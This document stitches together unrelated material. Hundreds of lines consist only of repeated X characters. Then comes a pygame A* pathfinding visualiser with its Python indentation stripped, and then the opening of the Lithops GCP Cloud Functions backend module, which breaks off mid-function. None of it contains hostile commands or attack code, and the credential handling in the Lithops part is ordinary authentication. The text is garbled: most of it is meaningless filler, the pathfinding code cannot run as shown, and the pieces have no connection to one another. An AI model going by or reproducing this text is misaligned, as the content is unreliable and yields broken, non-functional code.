XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX |
import pygame,sys,math
# Color constants
WHITE = 255, 255, 255
BLACK = 0, 0, 0
LIGHT_BLUE = 25, 120, 250
RED = 255, 0, 0
GREEN = 0, 255, 0
rows, cols = 50, 50
tile_size = 12
window_width, window_height = cols*tile_size, rows*tile_size
pygame.init()
win = pygame.display.set_mode((window_width, window_height))
clock = pygame.time.Clock()
class Spot:
def __init__(self, x, y):
self.x, self.y = x, y
self.f, self.g, self.h = 0, 0, 0
self.neighbors = []
self.prev = None
self.wall = False
def show(self, win, color):
pygame.draw.rect(win, color, (self.x*tile_size, self.y*tile_size, tile_size-1, tile_size-1))
def add_neighbors(self, grid):
x_offset = (1, 1, 1, 0, 0, -1, -1, -1)
y_offset = (-1, 0, 1, -1, 1, -1, 0, 1)
for x, y in zip(x_offset, y_offset): # For each neighbor
if self.x+x > -1 and self.y+y > -1 and self.x+x < cols and self.y+y < rows: # If it's in bounds
self.neighbors.append(grid[self.x+x][self.y+y]) # Add it to it's neighbor list
# Put or remove walls
def clickWall(pos, state):
tile = grid[pos[0] // tile_size][pos[1] // tile_size]
if tile not in (start, end):
tile.wall = state
def euclidean(a, b):
return ((a.x - b.x)**2 + (a.y - b.y)**2)**0.5
# Fill the grid with a 2d array of Spots (rows*cols)
grid = [[Spot(x, z) for z in range(rows)] for x in range(cols)]
# Calculate each neighbor count in the grid
for column in grid:
for cell in column:
cell.add_neighbors(grid)
# Put the start in the top left corner and end 3/4th in
start = grid[0][0]
end = grid[cols - cols//4][rows - rows//4]
openSet = [start]
closeSet = []
path = []
def main():
processing = False
while True:
'''
Event handler for drawing the obstacles and starting the algorithm
'''
for event in pygame.event.get(): # All events (mouse moving, button clicks, mouse clicks etc)
if event.type == pygame.QUIT: # If they try to close the window
pygame.quit()
sys.exit()
elif event.type == pygame.MOUSEBUTTONDOWN: # If they press the mouse (any button)
if event.button in (1, 3): # And it's a left or right click
clickWall(pygame.mouse.get_pos(), event.button==1) # Click a wall with either (True as a left click or False as not a left click (a right click)
elif event.type == pygame.MOUSEMOTION:
# event.buttons is a tuple of (x, y, z) e.g. (1, 0, 0) if they're holding a button, x = left click, y = middle and z = right click
if event.buttons[0] or event.buttons[2]: # If they're holding left or right click while dragging the mouse
clickWall(pygame.mouse.get_pos(), event.buttons[0]) # if the left click is being held, send True, else False (Right click)
elif event.type == pygame.KEYDOWN and event.key == pygame.K_RETURN: #When return key is pressed
processing = True
'''
When we begin (Return)
'''
if processing:
if len(openSet) > 0:
current = min(openSet, key = lambda x: x.f)
if current == end: # If we've found the end
temp = current
while temp.prev: # Working backwards from the end
path.append(temp.prev)
temp = temp.prev
# Once we've tracked from the end to the start, and built the path
processing = False
print("Solution found")
if processing:
openSet.remove(current)
closeSet.append(current)
# Move the current tile from the open set to the closed set
for neighbor in current.neighbors:
if neighbor not in closeSet and not neighbor.wall:
tempG = current.g + 1
newPath = False
if neighbor in openSet:
if tempG < neighbor.g:
neighbor.g = tempG
newPath = True
else:
neighbor.g = tempG
newPath = True
openSet.append(neighbor)
if newPath:
neighbor.h = euclidean(neighbor, end)
neighbor.f = neighbor.g + neighbor.h
neighbor.prev = current
else:
print("No Solution!\n-> There was no possible solution")
break
'''
Drawing the results
'''
for column in grid:
for spot in column:
if spot.wall:
spot.show(win, WHITE)
elif spot == end:
spot.show(win, LIGHT_BLUE)
elif spot in path and not processing:
spot.show(win, LIGHT_BLUE)
elif spot in closeSet:
spot.show(win, RED)
elif spot in openSet:
spot.show(win, GREEN)
else:
spot.show(win, BLACK)
pygame.display.flip()
main()
|
<reponame>giarve/lithops<filename>lithops/serverless/backends/gcp_functions/gcp_functions.py
#
# Copyright Cloudlab URV 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import logging
import json
import base64
import httplib2
import sys
import zipfile
import time
import lithops
from google.cloud import pubsub_v1
from google.oauth2 import service_account
from google_auth_httplib2 import AuthorizedHttp
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from google.auth import jwt
from lithops.version import __version__
from lithops.utils import version_str
from lithops.constants import COMPUTE_CLI_MSG, JOBS_PREFIX
from lithops.constants import TEMP as TEMP_PATH
from . import config as gcp_config
logger = logging.getLogger(__name__)
ZIP_LOCATION = os.path.join(TEMP_PATH, 'lithops_gcp.zip')
SCOPES = ('https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/pubsub')
FUNCTIONS_API_VERSION = 'v1'
PUBSUB_API_VERSION = 'v1'
AUDIENCE = "https://pubsub.googleapis.com/google.pubsub.v1.Publisher"
class GCPFunctionsBackend:
def __init__(self, gcp_functions_config, internal_storage):
self.name = 'gcp_functions'
self.type = 'faas'
self.gcp_functions_config = gcp_functions_config
self.package = 'lithops_v' + __version__
self.region = gcp_functions_config['region']
self.service_account = gcp_functions_config['service_account']
self.project = gcp_functions_config['project_name']
self.credentials_path = gcp_functions_config['credentials_path']
self.num_retries = gcp_functions_config['retries']
self.retry_sleep = gcp_functions_config['retry_sleep']
self.internal_storage = internal_storage
# Setup Pub/Sub client
try: # Get credentials from JSON file
service_account_info = json.load(open(self.credentials_path))
credentials = jwt.Credentials.from_service_account_info(service_account_info,
audience=AUDIENCE)
credentials_pub = credentials.with_claims(audience=AUDIENCE)
except: # Get credentials from gcp function environment
credentials_pub = None
self.publisher_client = pubsub_v1.PublisherClient(credentials=credentials_pub)
msg = COMPUTE_CLI_MSG.format('GCP Functions')
logger.info("{} - Region: {} - Project: {}".format(msg, self.region, self.project))
def _format_function_name(self, runtime_name, runtime_memory):
runtime_name = (self.package + '_' + runtime_name).replace('.', '-')
return '{}_{}MB'.format(runtime_name, runtime_memory)
def _format_topic_name(self, runtime_name, runtime_memory):
return self._format_function_name(runtime_name, runtime_memory) + '_topic'
def _unformat_action_name(self, action_name):
split = action_name.split('_')
runtime_name = split[2].replace('-', '.')
runtime_memory = int(split[3].replace('MB', ''))
return runtime_name, runtime_memory
def _full_function_location(self, function_name):
return 'projects/{}/locations/{}/functions/{}'.format(self.project, self.region, function_name)
def _full_topic_location(self, topic_name):
return 'projects/{}/topics/{}'.format(self.project, topic_name)
def _full_default_location(self):
return 'projects/{}/locations/{}'.format(self.project, self.region)
def _encode_payload(self, payload):
return base64.b64encode(bytes(json.dumps(payload), 'utf-8')).decode('utf-8')
def _get_auth_session(self):
credentials = service_account.Credentials.from_service_account_file(self.credentials_path,
scopes=SCOPES)
http = httplib2.Http()
return AuthorizedHttp(credentials, http=http)
def _get_funct_conn(self):
http = self._get_auth_session()
return build('cloudfunctions', FUNCTIONS_API_VERSION, http=http, cache_discovery=False)
def _get_default_runtime_image_name(self):
return 'python' + version_str(sys.version_info)
def _get_runtime_requirements(self, runtime_name):
if runtime_name in gcp_config.DEFAULT_RUNTIMES:
return gcp_config.DEFAULT_REQUIREMENTS
else:
user_runtimes = self._list_runtimes(default_runtimes=False)
if runtime_name in user_runtimes:
raw_reqs = self.internal_storage.get_data(key='/'.join([gcp_config.USER_RUNTIMES_PREFIX, runtime_name]))
reqs = raw_reqs.decode('utf-8')
return reqs.splitlines()
else:
raise Exception('Runtime {} does not exist. '
'Available runtimes: {}'.format(runtime_name,
gcp_config.DEFAULT_RUNTIMES + user_runtimes))
def _list_runtimes(self, default_runtimes=True):
runtimes = []
if default_runtimes:
runtimes.extend(gcp_config.DEFAULT_RUNTIMES)
user_runtimes_keys = self.internal_storage.storage.list_keys(self.internal_storage.bucket,
prefix=gcp_config.USER_RUNTIMES_PREFIX)
runtimes.extend([runtime.split('/', 1)[-1] for runtime in user_runtimes_keys])
return runtimes
def _create_handler_zip(self, runtime_name):
logger.debug("Creating function handler zip in {}".format(ZIP_LOCATION))
def add_folder_to_zip(zip_file, full_dir_path, sub_dir=''):
for file in os.listdir(full_dir_path):
full_path = os.path.join(full_dir_path, file)
if os.path.isfile(full_path):
zip_file.write(full_path, os.path.join('lithops', sub_dir, file), zipfile.ZIP_DEFLATED)
elif os.path.isdir(full_path) and '__pycache__' not in full_path:
add_folder_to_zip(zip_file, full_path, os.path.join(sub_dir, file))
# Get runtime requirements
runtime_requirements = self._get_runtime_requirements(runtime_name)
requirements_file_path = os.path.join(TEMP_PATH, '{}_requirements.txt'.format(runtime_name))
with open(requirements_file_path, 'w') as reqs_file:
for req in runtime_requirements:
reqs_file.write('{}\n'.format(req))
try:
with zipfile.ZipFile(ZIP_LOCATION, 'w') as lithops_zip:
# Add Lithops entryfile to zip archive
current_location = os.path.dirname(os.path.abspath(__file__))
main_file = os.path.join(current_location, 'entry_point.py')
lithops_zip.write(main_file, 'main.py', zipfile.ZIP_DEFLATED)
# Add runtime requirements.txt to zip archive
lithops_zip.write(requirements_file_path, 'requirements.txt', zipfile.ZIP_DEFLATED)
# Add Lithops to zip archive
module_location = os.path.dirname(os.path.abspath(lithops.__file__))
add_folder_to_zip(lithops_zip, module_location)
except Exception as e:
raise Exception('Unable to create Lithops package: {}'.format(e))
def _create_function(self, runtime_name, memory, code, timeout=60, trigger='HTTP'):
